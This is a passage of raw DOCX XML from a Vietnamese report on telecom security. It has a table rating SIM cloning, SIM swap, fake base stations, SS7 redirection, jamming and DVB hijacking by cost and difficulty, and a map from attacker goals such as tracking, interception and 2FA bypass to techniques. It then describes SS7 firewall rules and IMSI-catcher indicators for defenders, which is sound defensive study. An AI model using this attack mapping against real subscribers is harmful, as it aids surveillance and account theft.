          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Radio L1–L2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Có (50m–500m)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$700–$2,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cao</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Thấp (5G SA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SIM Cloning COMP128</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Physical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Có (vật lý)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$50–$200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Thấp–Trung</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">N/A (SIM thế hệ mới)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SIM Swap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Social Eng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Không cần</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">~$0 (kỹ năng)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Thấp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cao (protocol-agnostic)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fake eNodeB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Radio L1–L2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Có (100m–1km)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$700–$2,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rất cao</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Thấp (5G SA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SS7 Call Redirect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Signalling L7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Không</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Như SS7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cao</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Thấp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Selective Jamming</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Radio L1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Có (10m–500m)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$30–$5,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Thấp–Cao</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cao (jam là physical)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">DVB Hijacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Broadcast RF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Có (khu vực)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$300–$2,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cao</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="83"/>
    <w:bookmarkStart w:id="84" w:name="phân-loại-theo-mục-tiêu"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.2 Phân Loại Theo Mục Tiêu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Mục tiêu: Theo dõi vị trí</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  → SS7 PSI/ATI (remote, liên tục)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  → IMSI Catcher (local, chính xác cao)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Mục tiêu: Chặn liên lạc (cuộc gọi/SMS)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  → SS7 ISD + RegisterSS (remote, vô hình)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  → IMSI Catcher Active MITM (local)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  → SIM Cloning (sau khi clone)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Mục tiêu: Vô hiệu hóa liên lạc</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  → SS7 CancelLocation + RegisterSS CFNRc (remote)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  → Fake eNodeB DoS mode (local)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  → Selective Jamming (physical, brute force)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Mục tiêu: Chiếm đoạt tài khoản</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  → SIM Swap + 2FA bypass</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  → SS7 SMS interception + 2FA bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="84"/>
    <w:bookmarkEnd w:id="85"/>
    <w:bookmarkStart w:id="90" w:name="cơ-chế-phòng-thủ"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12. Cơ Chế Phòng Thủ</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="86" w:name="phòng-thủ-chống-ss7diameter"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.1 Phòng Thủ Chống SS7/Diameter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Kiến trúc giải pháp:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">┌─────────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                   SS7 Security Architecture                     │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                                                                 │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  External SS7      ┌──────────────────────────────────────┐    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  Network    ──────►│         SS7 Firewall / STP           │    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                    │                                      │    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                    │  Whitelist-based filtering:          │    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                    │  ├── Cho phép: SRI từ GT hợp lệ     │    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                    │  ├── Chặn: PSI từ GT không rõ       │    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                    │  ├── Chặn: ISD từ ngoài mạng        │    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                    │  ├── Chặn: RegisterSS từ ngoài      │    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                    │  └── Rate limit: SRI &gt; 10/giây/GT   │    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                    │                                      │    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                    │  Anomaly Detection:                  │    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                    │  ├── PSI queries cho IMSI nội mạng  │    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                    │  ├── SRI burst patterns              │    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                    │  └── GT spoofing indicators          │    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                    └──────────────────────────────────────┘    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                                   │                            │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                           Internal Network                     │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">└─────────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Giải pháp thương mại:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Positive Technologies PT TAD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Phân tích traffic SS7/Diameter theo thời gian thực, ML-based anomaly detection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Mobileum RAVEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: SS7/Diameter security monitoring với threat intelligence</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">GSMA FS.11 compliant firewall</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Triển khai filtering theo khuyến nghị GSMA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cấu hình SS7 Firewall rules (mô tả):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ALLOW: MAP SRI từ [danh sách GT nhà mạng partner đã biết]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ALLOW: MAP ISD chỉ từ GT nội mạng</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BLOCK: MAP PSI từ mọi GT bên ngoài</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BLOCK: MAP RegisterSS từ GT bên ngoài  </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BLOCK: MAP CancelLocation từ GT bên ngoài</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ALERT: SRI rate &gt; 100 queries/phút từ một GT</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ALERT: PSI queries cho subscriber không roaming</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="86"/>
    <w:bookmarkStart w:id="87" w:name="phòng-thủ-chống-imsi-catcher"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.2 Phòng Thủ Chống IMSI Catcher</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phía mạng:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5G NR SUCI (Subscription Concealed Identifier)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: IMSI được mã hóa bằng ECIES trước khi truyền qua air interface, sử dụng public key của HPLMN → IMSI Catcher không thể giải mã IMSI từ tín hiệu vô tuyến</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cấm kết nối 2G</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Operators có thể tắt GSM fallback để loại bỏ downgrade attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ARPF (Authentication credential Repository and Processing Function)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Trong 5G, xác thực lẫn nhau bắt buộc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phía người dùng:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">AIMSICD (Android IMSI-Catcher Detector)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Phát hiện dựa trên:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Biến động bất thường của cell parameters (LAC, ARFCN)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Xuất hiện cell với cùng MCC/MNC nhưng Cell-ID không quen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Downgrade từ LTE về GSM đột ngột</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Giảm RSRP đột ngột sau khi kết nối cell mới</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CryptoPhone (GSMK)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Firmware điện thoại tăng cường, hiển thị cảnh báo khi phát hiện indicators</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Chỉ số phát hiện IMSI Catcher (Indicators of Compromise):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Cell change đột ngột sang cell có LAC = 0 hoặc LAC lạ</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Authentication được yêu cầu 2 lần liên tiếp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Call encryption disabled (A5/0 indicator)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Cell broadcast channel bị tắt (BCC bit)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Neighbor cell list trống hoặc chỉ 1 cell</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Timing advance = 0 (thiết bị ở ngay cạnh "trạm")</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="87"/>
    <w:bookmarkStart w:id="88" w:name="phòng-thủ-chống-jamming"/>
    <w:p>
